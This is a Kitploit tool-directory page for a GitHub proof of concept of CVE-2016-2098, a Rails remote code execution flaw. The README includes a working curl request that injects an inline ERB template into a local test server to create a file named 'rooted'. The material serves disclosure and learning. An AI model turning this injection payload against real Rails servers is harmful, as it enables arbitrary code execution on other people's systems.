Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
dh-CVE_2016_2098 — Proof of concept showing how CVE-2016-2098 leads to remote code execution | Kitploit
Tools/GitHubGitHub/hderms/dh-cve_2016_2098
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubhderms/dh-cve_2016_2098

dh-CVE_2016_2098

Proof of concept showing how CVE-2016-2098 leads to remote code execution

View Repository
3410 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

== README Proof of concept for https://groups.google.com/forum/#!topic/rubyonrails-security/ly-IH-fxr_Q

== Exploiting:

  1. You should only run rails server in a way that you are certain will not open you up to being exploited
  2. Run rails s
  3. Execute the following command curl -v -H "Accept: application/json" -H "Content-type: application/json" -X GET -d ' {"id" : { "inline" : "<%= FileUtils.touch \"rooted\"%>"}}' http://localhost:3000/exploits
  4. Verify that the file "rooted" now exists in the project directory
Download Tool